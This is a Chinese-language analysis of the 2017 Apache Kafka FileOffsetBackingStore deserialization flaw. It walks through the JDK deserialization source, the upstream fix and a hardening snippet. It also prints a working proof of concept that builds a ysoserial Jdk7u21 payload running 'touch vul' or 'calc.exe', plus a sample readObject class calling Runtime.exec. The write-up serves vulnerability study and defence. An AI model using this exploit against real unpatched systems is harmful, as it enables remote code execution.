Kafka反序列化漏洞分析

1.Kafka反序列化漏洞简介

Apache Kafka 是开源的 Apache 流处理平台,由 Apache编写,采用scala与java。该项目旨在于提供一个统一的、高吞吐量的、低延迟的实时数据处理平台(中间件模型应用广泛)。

2017年7月19日曝出,Apache kafka connect-runtime 包,在执行 FileOffsetBackingStore 类时,可实现一个反序列化漏洞,这将导致远程代码执行。

Kafka开源代码 Github:https://github.com/apache/kafka/

Kafka官方文档:http://kafka.apache.org/

官方漏洞公告:http://seclists.org/oss-sec/2017/q3/184

2.漏洞概述

Kafka 内部实现一个带有 readObject 方法的并且未带有任何校验的危险类,如果用户在使用该框架中,使用了该类的话,通过设置相关参数后实例化该类的时候会导致远程代码执行。

受影响版本:Apache Kafka 0.10.0.0 -> 0.11.0.0(2017/09/13当前最新版本为0.11.0.0)

考虑到实际生产环境这样的代码逻辑并不常见,根据影响,确认为中低危漏洞。

3.漏洞详情

漏洞复现POC

官方漏洞复现POC:http://seclists.org/oss-sec/2017/q3/184

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public void test_Kafka_Deser() throws Exception {

StandaloneConfig config;

String projectDir = System.getProperty("user.dir");

Jdk7u21 jdk7u21 = new Jdk7u21();
Object o = jdk7u21.getObject("touch vul");

byte[] ser = serialize(o);

File tempFile = new File(projectDir + "/payload.ser");
FileUtils.writeByteArrayToFile(tempFile, ser);

Map<String, String> props = new HashMap<String, String>();
props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
tempFile.getAbsolutePath());
props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
config = new StandaloneConfig(props);

FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
restore.start();
}

private byte[] serialize(Object object) throws IOException {
ByteArrayOutputStream bout = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(bout);
out.writeObject(object);
out.flush();
return bout.toByteArray();
}

ysoserial简介

ysoserial 是一个构造恶意序列化对象的工具包。

github地址:https://github.com/frohoff/ysoserial/

由于该组件没有入maven中央仓库,因此需要将代码clone到本地,编译,部署到本地maven仓库。

1
2
3
git clone git@github.com:frohoff/ysoserial.git
cd ysoserial
mvn install -DskipTests

恶意序列化代码

其实核心的恶意序列化代码是如下两行

1
2
Jdk7u21 jdk7u21 = new Jdk7u21();
Object o = jdk7u21.getObject("touch vul");

由于touch是linux命令,在windows环境下,我改为了如下,即执行计算器程序。

1
2
Jdk7u21 jdk7u21 = new Jdk7u21();
Object o = jdk7u21.getObject("calc.exe");

github demo:https://github.com/shiyueqi/kafka-deserialization-bug

漏洞解析

org.apache.kafka.connect.storage.FileOffsetBackingStore 这个class拥有一个反序列化操作,在执行 FileOffsetBackingStore 对象的start方法时候会触发并反序列恶意序列化对象,导致代码执行。

再来看一下上面的漏洞复现POC中,优先调用了FileOffsetBackingStore 对象的 configure 方法。

1
2
3
4
5
@Override
public void configure(WorkerConfig config) {
super.configure(config);
file = new File(config.getString(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG));
}

调用configure方法后,对类成员变量this.file赋值,赋值为为传入的文件。然后继续调用FileOffsetBackingStore 对象的start方法。

1
2
3
4
5
6
@Override
public synchronized void start() {
super.start();
log.info("Starting FileOffsetBackingStore with file {}", file);
load();
}

调用start方法时,start() 方法会调用load方法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
@SuppressWarnings("unchecked")
private void load() {
try {
ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));
Object obj = is.readObject();
if (!(obj instanceof HashMap))
throw new ConnectException("Expected HashMap but found " + obj.getClass());
Map<byte[], byte[]> raw = (Map<byte[], byte[]>) obj;
data = new HashMap<>();
for (Map.Entry<byte[], byte[]> mapEntry : raw.entrySet()) {
ByteBuffer key = (mapEntry.getKey() != null) ? ByteBuffer.wrap(mapEntry.getKey()) : null;
ByteBuffer value = (mapEntry.getValue() != null) ? ByteBuffer.wrap(mapEntry.getValue()) : null;
data.put(key, value);
}
is.close();
} catch (FileNotFoundException | EOFException e) {
// FileNotFoundException: Ignore, may be new.
// EOFException: Ignore, this means the file was missing or corrupt
} catch (IOException | ClassNotFoundException e) {
throw new ConnectException(e);
}
}

在load()方法中可以看到通过 ObjectInputStream 类加载,将 this.file 的值读取到 is 中,这里就是我们构造的恶意序列化的对象。而接下来调用的 readObject() 方法正好会反序列化这个对象。

而在 FileOffsetBackingStore 在反序列化过程中,是直接调用了 java.io.ObjectInputStream 类的 readObject() 方法,没有对传入参数进行验证。这将允许攻击者构造序列化对象并执行恶意代码。

4.源码分析

概述

恶意序列化的核心思想是构造恶意的对象,在执行反序列化过程时,执行构造对象的反序列化方法,从而完成远程漏洞执行。
如下代码,构造一个 DeserializationObject 类,实现 readObject() 方法,方法内调用 Runtime.getRuntime().exec("calc.exe"); 即通过命令的方式,打开计算器。

完整代码如下:

1
2
3
4
5
6
static class DeserializationObject implements Serializable {
private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException {
input.defaultReadObject();
Runtime.getRuntime().exec("calc.exe");
}
}

源码跟踪

FileOffsetBackingStore

关于 FileOffsetBackingStore 类的调用代码如下:

1
2
3
FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
restore.start();

FileOffsetBackingStore类的configure()方法和start()方法源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
@Override
public void configure(WorkerConfig config) {
super.configure(config);
file = new File(config.getString(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG));
}

@Override
public synchronized void start() {
super.start();
log.info("Starting FileOffsetBackingStore with file {}", file);
load();
}

可以看到,调用configure方法后,对类成员变量this.file赋值,赋值为为传入的文件。调用start方法后,直接进入load方法。而在这里,我们先构造恶意对象,然后进行序列化,保存到文件中,再将该文件作为参数传入FileOffsetBackingStore类的configure()方法中。

load()方法如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
@SuppressWarnings("unchecked")
private void load() {
try {
ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));
Object obj = is.readObject();
if (!(obj instanceof HashMap))
throw new ConnectException("Expected HashMap but found " + obj.getClass());
Map<byte[], byte[]> raw = (Map<byte[], byte[]>) obj;
data = new HashMap<>();
for (Map.Entry<byte[], byte[]> mapEntry : raw.entrySet()) {
ByteBuffer key = (mapEntry.getKey() != null) ? ByteBuffer.wrap(mapEntry.getKey()) : null;
ByteBuffer value = (mapEntry.getValue() != null) ? ByteBuffer.wrap(mapEntry.getValue()) : null;
data.put(key, value);
}
is.close();
} catch (FileNotFoundException | EOFException e) {
// FileNotFoundException: Ignore, may be new.
// EOFException: Ignore, this means the file was missing or corrupt
} catch (IOException | ClassNotFoundException e) {
throw new ConnectException(e);
}
}

可以看到刚进入load()方法,即构造ObjectInputStream类对象,

1
ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));

FileInputStream类

调用 FileInputStream 类的构造方法,可以看到首先拿到文件的name,再创建一个文件句柄,即 FileDescriptor 类对象,最后调用open方法,将入参file对象内容读入。而open方法已经是调用底层的 native 方法。

该方法的注释中,也声明:对指定的文件,打开一个连接,创建一个文件输入流。一个文件句柄对象会被创建,用来持有该连接。

源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/**
* Creates a <code>FileInputStream</code> by
* opening a connection to an actual file,
* the file named by the <code>File</code>
* object <code>file</code> in the file system.
* A new <code>FileDescriptor</code> object
* is created to represent this file connection.
* <p>
* First, if there is a security manager,
* its <code>checkRead</code> method is called
* with the path represented by the <code>file</code>
* argument as its argument.
* <p>
* If the named file does not exist, is a directory rather than a regular
* file, or for some other reason cannot be opened for reading then a
* <code>FileNotFoundException</code> is thrown.
*
* @param file the file to be opened for reading.
* @exception FileNotFoundException if the file does not exist,
* is a directory rather than a regular file,
* or for some other reason cannot be opened for
* reading.
* @exception SecurityException if a security manager exists and its
* <code>checkRead</code> method denies read access to the file.
* @see java.io.File#getPath()
* @see java.lang.SecurityManager#checkRead(java.lang.String)
*/

public FileInputStream(File file) throws FileNotFoundException {
String name = (file != null ? file.getPath() : null);
SecurityManager security = System.getSecurityManager();
if (security != null) {
security.checkRead(name);
}
if (name == null) {
throw new NullPointerException();
}
fd = new FileDescriptor();
fd.incrementAndGetUseCount();
open(name);
}

/**
* Opens the specified file for reading.
* @param name the name of the file
*/

private native void open(String name) throws FileNotFoundException;

ObjectInputStream

调用 ObjectInputStream 构造方法。可以看到,基本都是一些初始化操作。源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/**
* Creates an ObjectInputStream that reads from the specified InputStream.
* A serialization stream header is read from the stream and verified.
* This constructor will block until the corresponding ObjectOutputStream
* has written and flushed the header.
*
* <p>If a security manager is installed, this constructor will check for
* the "enableSubclassImplementation" SerializablePermission when invoked
* directly or indirectly by the constructor of a subclass which overrides
* the ObjectInputStream.readFields or ObjectInputStream.readUnshared
* methods.
*
* @param in input stream to read from
* @throws StreamCorruptedException if the stream header is incorrect
* @throws IOException if an I/O error occurs while reading stream header
* @throws SecurityException if untrusted subclass illegally overrides
* security-sensitive methods
* @throws NullPointerException if <code>in</code> is <code>null</code>
* @see ObjectInputStream#ObjectInputStream()
* @see ObjectInputStream#readFields()
* @see ObjectOutputStream#ObjectOutputStream(OutputStream)
*/

public ObjectInputStream(InputStream in) throws IOException {
verifySubclass();
bin = new BlockDataInputStream(in);
handles = new HandleTable(10);
vlist = new ValidationList();
enableOverride = false;
readStreamHeader();
bin.setBlockDataMode(true);
}

readObject()

再回到 FileOffsetBackingStore 类的 start() 方法调用的 load() 方法中,在构造完 ObjectInputStream 对象后,调用

1
2
ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));
Object obj = is.readObject();

实际调用 ObjectInputStream 类中的 readObject() 方法。源码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
/**
* Read an object from the ObjectInputStream. The class of the object, the
* signature of the class, and the values of the non-transient and
* non-static fields of the class and all of its supertypes are read.
* Default deserializing for a class can be overriden using the writeObject
* and readObject methods. Objects referenced by this object are read
* transitively so that a complete equivalent graph of objects is
* reconstructed by readObject.
*
* <p>The root object is completely restored when all of its fields and the
* objects it references are completely restored. At this point the object
* validation callbacks are executed in order based on their registered
* priorities. The callbacks are registered by objects (in the readObject
* special methods) as they are individually restored.
*
* <p>Exceptions are thrown for problems with the InputStream and for
* classes that should not be deserialized. All exceptions are fatal to
* the InputStream and leave it in an indeterminate state; it is up to the
* caller to ignore or recover the stream state.
*
* @throws ClassNotFoundException Class of a serialized object cannot be
* found.
* @throws InvalidClassException Something is wrong with a class used by
* serialization.
* @throws StreamCorruptedException Control information in the
* stream is inconsistent.
* @throws OptionalDataException Primitive data was found in the
* stream instead of objects.
* @throws IOException Any of the usual Input/Output related exceptions.
*/

public final Object readObject()
throws IOException, ClassNotFoundException
{

if (enableOverride) {
return readObjectOverride();
}

// if nested read, passHandle contains handle of enclosing object
int outerHandle = passHandle;
try {
Object obj = readObject0(false);
handles.markDependency(outerHandle, passHandle);
ClassNotFoundException ex = handles.lookupException(passHandle);
if (ex != null) {
throw ex;
}
if (depth == 0) {
vlist.doCallbacks();
}
return obj;
} finally {
passHandle = outerHandle;
if (closed && depth == 0) {
clear();
}
}
}

继续调用 ObjectInputStream 中的 readObject0() 方法。

readObject0() 方法中关键源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
/**
* Underlying readObject implementation.
*/

private Object readObject0(boolean unshared) throws IOException {
boolean oldMode = bin.getBlockDataMode();
if (oldMode) {
int remain = bin.currentBlockRemaining();
if (remain > 0) {
throw new OptionalDataException(remain);
} else if (defaultDataEnd) {
/*
* Fix for 4360508: stream is currently at the end of a field
* value block written via default serialization; since there
* is no terminating TC_ENDBLOCKDATA tag, simulate
* end-of-custom-data behavior explicitly.
*/

throw new OptionalDataException(true);
}
bin.setBlockDataMode(false);
}

byte tc;
while ((tc = bin.peekByte()) == TC_RESET) {
bin.readByte();
handleReset();
}

depth++;
try {
switch (tc) {
case TC_NULL:
return readNull();

case TC_REFERENCE:
return readHandle(unshared);

case TC_CLASS:
return readClass(unshared);

case TC_CLASSDESC:
case TC_PROXYCLASSDESC:
return readClassDesc(unshared);

case TC_STRING:
case TC_LONGSTRING:
return checkResolve(readString(unshared));

case TC_ARRAY:
return checkResolve(readArray(unshared));

case TC_ENUM:
return checkResolve(readEnum(unshared));

case TC_OBJECT:
return checkResolve(readOrdinaryObject(unshared));

case TC_EXCEPTION:
IOException ex = readFatalException();
throw new WriteAbortedException("writing aborted", ex);

case TC_BLOCKDATA:
case TC_BLOCKDATALONG:
if (oldMode) {
bin.setBlockDataMode(true);
bin.peek(); // force header read
throw new OptionalDataException(
bin.currentBlockRemaining());
} else {
throw new StreamCorruptedException(
"unexpected block data");
}

case TC_ENDBLOCKDATA:
if (oldMode) {
throw new OptionalDataException(true);
} else {
throw new StreamCorruptedException(
"unexpected end of block data");
}

default:
throw new StreamCorruptedException(
String.format("invalid type code: %02X", tc));
}
} finally {
depth--;
bin.setBlockDataMode(oldMode);
}
}

可以看到会对传入参数进行匹配,因为构造的恶意对象为Object类型,因此会触发 case TC_OBJECT 这个条件。继续调用 readOrdinaryObject() 方法。

源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
/**
* Reads and returns "ordinary" (i.e., not a String, Class,
* ObjectStreamClass, array, or enum constant) object, or null if object's
* class is unresolvable (in which case a ClassNotFoundException will be
* associated with object's handle). Sets passHandle to object's assigned
* handle.
*/

private Object readOrdinaryObject(boolean unshared)
throws IOException
{

if (bin.readByte() != TC_OBJECT) {
throw new InternalError();
}

ObjectStreamClass desc = readClassDesc(false);
desc.checkDeserialize();

Object obj;
try {
obj = desc.isInstantiable() ? desc.newInstance() : null;
} catch (Exception ex) {
throw (IOException) new InvalidClassException(
desc.forClass().getName(),
"unable to create instance").initCause(ex);
}

passHandle = handles.assign(unshared ? unsharedMarker : obj);
ClassNotFoundException resolveEx = desc.getResolveException();
if (resolveEx != null) {
handles.markException(passHandle, resolveEx);
}

if (desc.isExternalizable()) {
readExternalData((Externalizable) obj, desc);
} else {
readSerialData(obj, desc);
}

handles.finish(passHandle);

if (obj != null &&
handles.lookupException(passHandle) == null &&
desc.hasReadResolveMethod())
{
Object rep = desc.invokeReadResolve(obj);
if (unshared && rep.getClass().isArray()) {
rep = cloneArray(rep);
}
if (rep != obj) {
handles.setObject(passHandle, obj = rep);
}
}

return obj;
}

调用 readSerialData(obj, desc) 方法。源码如下,核心代码为 slotDesc.invokeReadObject(obj, this);

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
/**
* Reads (or attempts to skip, if obj is null or is tagged with a
* ClassNotFoundException) instance data for each serializable class of
* object in stream, from superclass to subclass. Expects that passHandle
* is set to obj's handle before this method is called.
*/

private void readSerialData(Object obj, ObjectStreamClass desc)
throws IOException
{

ObjectStreamClass.ClassDataSlot[] slots = desc.getClassDataLayout();
for (int i = 0; i < slots.length; i++) {
ObjectStreamClass slotDesc = slots[i].desc;

if (slots[i].hasData) {
if (obj != null &&
slotDesc.hasReadObjectMethod() &&
handles.lookupException(passHandle) == null)
{
SerialCallbackContext oldContext = curContext;

try {
curContext = new SerialCallbackContext(obj, slotDesc);

bin.setBlockDataMode(true);
slotDesc.invokeReadObject(obj, this);
} catch (ClassNotFoundException ex) {
/*
* In most cases, the handle table has already
* propagated a CNFException to passHandle at this
* point; this mark call is included to address cases
* where the custom readObject method has cons'ed and
* thrown a new CNFException of its own.
*/

handles.markException(passHandle, ex);
} finally {
curContext.setUsed();
curContext = oldContext;
}

/*
* defaultDataEnd may have been set indirectly by custom
* readObject() method when calling defaultReadObject() or
* readFields(); clear it to restore normal read behavior.
*/

defaultDataEnd = false;
} else {
defaultReadFields(obj, slotDesc);
}
if (slotDesc.hasWriteObjectData()) {
skipCustomData();
} else {
bin.setBlockDataMode(false);
}
} else {
if (obj != null &&
slotDesc.hasReadObjectNoDataMethod() &&
handles.lookupException(passHandle) == null)
{
slotDesc.invokeReadObjectNoData(obj);
}
}
}
}

ObjectStreamClass 类的反射调用

调用 ObjectStreamClass 类的 invokeReadObject() 方法。源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/**
* Invokes the readObject method of the represented serializable class.
* Throws UnsupportedOperationException if this class descriptor is not
* associated with a class, or if the class is externalizable,
* non-serializable or does not define readObject.
*/

void invokeReadObject(Object obj, ObjectInputStream in)
throws ClassNotFoundException, IOException,
UnsupportedOperationException
{

if (readObjectMethod != null) {
try {
readObjectMethod.invoke(obj, new Object[]{ in });
} catch (InvocationTargetException ex) {
Throwable th = ex.getTargetException();
if (th instanceof ClassNotFoundException) {
throw (ClassNotFoundException) th;
} else if (th instanceof IOException) {
throw (IOException) th;
} else {
throwMiscException(th);
}
} catch (IllegalAccessException ex) {
// should not occur, as access checks have been suppressed
throw new InternalError();
}
} else {
throw new UnsupportedOperationException();
}
}

这时候可以看到这行代码,就是反射调用了。

1
readObjectMethod.invoke(obj, new Object[]{ in });

再看一下 readObjectMethod ,这个 ObjectStreamClass 类的成员变量的定义。在 ObjectStreamClass 类的构造方法中,对 readObjectMethod 进行了初始化。 ObjectStreamClass 类的构造方法源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
/**
* Creates local class descriptor representing given class.
*/

private ObjectStreamClass(final Class<?> cl) {
this.cl = cl;
name = cl.getName();
isProxy = Proxy.isProxyClass(cl);
isEnum = Enum.class.isAssignableFrom(cl);
serializable = Serializable.class.isAssignableFrom(cl);
externalizable = Externalizable.class.isAssignableFrom(cl);

Class<?> superCl = cl.getSuperclass();
superDesc = (superCl != null) ? lookup(superCl, false) : null;
localDesc = this;

if (serializable) {
AccessController.doPrivileged(new PrivilegedAction<Void>() {
public Void run() {
if (isEnum) {
suid = Long.valueOf(0);
fields = NO_FIELDS;
return null;
}
if (cl.isArray()) {
fields = NO_FIELDS;
return null;
}

suid = getDeclaredSUID(cl);
try {
fields = getSerialFields(cl);
computeFieldOffsets();
} catch (InvalidClassException e) {
serializeEx = deserializeEx =
new ExceptionInfo(e.classname, e.getMessage());
fields = NO_FIELDS;
}

if (externalizable) {
cons = getExternalizableConstructor(cl);
} else {
cons = getSerializableConstructor(cl);
writeObjectMethod = getPrivateMethod(cl, "writeObject",
new Class<?>[] { ObjectOutputStream.class },
Void.TYPE);
readObjectMethod = getPrivateMethod(cl, "readObject",
new Class<?>[] { ObjectInputStream.class },
Void.TYPE);
readObjectNoDataMethod = getPrivateMethod(
cl, "readObjectNoData", null, Void.TYPE);
hasWriteObjectData = (writeObjectMethod != null);
}
writeReplaceMethod = getInheritableMethod(
cl, "writeReplace", null, Object.class);
readResolveMethod = getInheritableMethod(
cl, "readResolve", null, Object.class);
return null;
}
});
} else {
suid = Long.valueOf(0);
fields = NO_FIELDS;
}

try {
fieldRefl = getReflector(fields, this);
} catch (InvalidClassException ex) {
// field mismatches impossible when matching local fields vs. self
throw new InternalError();
}

if (deserializeEx == null) {
if (isEnum) {
deserializeEx = new ExceptionInfo(name, "enum type");
} else if (cons == null) {
deserializeEx = new ExceptionInfo(name, "no valid constructor");
}
}
for (int i = 0; i < fields.length; i++) {
if (fields[i].getField() == null) {
defaultSerializeEx = new ExceptionInfo(
name, "unmatched serializable field(s) declared");
}
}
}

可以看到,readObjectMethod 定义如下:

1
2
3
readObjectMethod = getPrivateMethod(cl, "readObject",
new Class<?>[] { ObjectInputStream.class },
Void.TYPE);

第二个参数为反射调用的方法名称,即 readObject;第三个参数为反射调用的方法参数,为 ObjectInputStream 类的对象;最后一个参数为反射调用的方法返回值,即 void 类型。

因此,在构造恶意序列化对象时,实现如下的方法即可。

1
private void readObject(ObjectInputStream input)

5.解决方案

kafka官方已经修复了该漏洞,如下为commit链接。

https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef

kafka_deserialization_bug_fix_1

kafka_deserialization_bug_fix_2

kafka_deserialization_bug_fix_3

通过fix代码可以看到新加入了自己实现的 org.apache.kafka.connect.util.SafeObjectInputStream 而用来替代原有的JDK中的 java.io.ObjectInputStream 类。

SafeObjectInputStream 继承了 ObjectInputStream ,代码里加入一个黑名单列表,并使用resolveClass.isBlacklisted() 过滤掉黑名单类。

预计在0.11.0.1版本推出该功能。

6.JVM 禁止执行外部命令

严格意义说起来,Java相对来说安全性问题比较少,出现的一些问题大部分是利用反射,最终用Runtime.exec(String cmd)函数来执行外部命令的。如果可以禁止JVM执行外部命令,未知漏洞的危害性会大大降低,可以大大提高JVM的安全性。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
SecurityManager originalSecurityManager = System.getSecurityManager();
if (originalSecurityManager == null) {
// 创建自己的SecurityManager
SecurityManager sm = new SecurityManager() {
private void check(Permission perm) {
// 禁止exec
if (perm instanceof java.io.FilePermission) {
String actions = perm.getActions();
if (actions != null &amp;&amp; actions.contains("execute")) {
throw new SecurityException("execute denied!");
}
}
// 禁止设置新的SecurityManager
if (perm instanceof java.lang.RuntimePermission) {
String name = perm.getName();
if (name != null &amp;&amp; name.contains("setSecurityManager")) {
throw new SecurityException(
"System.setSecurityManager denied!");
}
}
}
@Override
public void checkPermission(Permission perm) {
check(perm);
}
@Override
public void checkPermission(Permission perm, Object context) {
check(perm);
}
};
System.setSecurityManager(sm);
}

如上所示,只要在Java代码里简单加一段程序,就可以禁止执行外部程序了。

禁止JVM执行外部命令,是一个简单有效的提高JVM安全性的办法。可以考虑在代码安全扫描时,加强对Runtime.exec相关代码的检测。

7.参考链接

  1. https://github.com/apache/kafka/
  2. http://kafka.apache.org/
  3. http://seclists.org/oss-sec/2017/q3/184
  4. http://www.openwall.com/lists/oss-security/2017/07/19/1
  5. http://bobao.360.cn/learning/detail/4190.html
  6. http://seclist.us/ysoserial-v-0-0-3-a-proof-of-concept-tool-for-generating-payloads-that-exploit-unsafe-java-object-deserialization.html
  7. https://github.com/frohoff/ysoserial/
  8. https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef